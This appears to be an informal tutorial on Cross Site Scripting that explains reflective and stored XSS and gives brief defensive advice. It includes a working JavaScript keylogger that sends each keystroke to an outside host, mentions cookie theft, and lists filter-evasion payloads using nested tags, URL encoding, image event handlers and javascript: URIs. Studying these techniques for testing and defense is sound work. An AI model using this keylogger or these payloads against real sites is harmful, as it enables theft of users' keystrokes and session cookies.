Cross Site Scripting (XSS)
XSS is a type of injection attack that trys to execute a foreign piece of javascript in anothers browser.
XSS has the two victims, the first being a website/service that allows an attacker to "lay the trap" for the sites group of users. The second victim is the end user who navigates to a site where there is javascript being executed from a seemingly reliable source.
The possibilities of what an XSS attack can accomplish are huge.
You could set up a keylogger:
/*
Simple javascript keylogger by Th3_M4d_H4tt3r
*/
document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)
http.open("POST","http://pyworm.noads.biz/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
or steal cookie information via document.cookie, or do repoints (window.location.assign()), etc
There are two main categories. Reflective and Stored.
Reflective is when a script is executed from a url variable/get request, by means of a temporary storage; For a reflective attack a url would have to be crafted and delivered to the victim (email,im, etc)
Stored is when a script is stored in the website's database and is executed each time the page loads.
Example:
Save a script as your first name. Then anytime someone views your profile the script fires.
The most simple code to test with is a simple
<script>alert(1)</script>
Most filters will catch this nowadays, so don't expect to hack the planet with it.
Google "XSS filter evasion" if you want to find a whole lot of tricks that people are doing to bypass all the different filters out there.
Some intersting filter evasions:
<scr<script>ipt>alert(1)</scr</script>ipt>
This can be used if see that a filter is pulling out <script> tags, if it removes and concats the substrings without checking their new result then your attack will land.
Use a character encoder, like this http://ha.ckers.org/xsscalc.html To turn this
<script>alert(1)</script>
into this%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
Using HTML attributes to initiate javascript can be used if you cannot get the <script> tags past the filter.
<img src=x onerror=alert(1)>
<img src=x onmouseover=alert(1)>
<img src=javascript:alert(1)>
Obfuscation is the practice of obscuring the code with extraneous information that will allow the attack to slip by the filter.
<img src=`javascript:alert(1)`>
<body onload!#$)*~+-_.,`=alert(1)>
The most important thing to keep in mind is that if a tactic is on a public evasion sheet, the filter makers know about it, but I've found that I will have more luck if I mix the evasion tactics of one, two, or three into a single attack.
Defense tips
HTML encoding is usually the first thing people throw out:
PHP's htmlentities()
.Net v4's System.Net.WebUtility.HtmlEncode
But there are also some other best practices that you can use to help keep your site secure.
1. Know where all outside data is rendered on your site.
2. Know the default storage state of information, notate the columns in a database that store unescaped information.
3. Be aware that HTML encoding, Hex encoding, and URL encoding all exist and know where to implement them.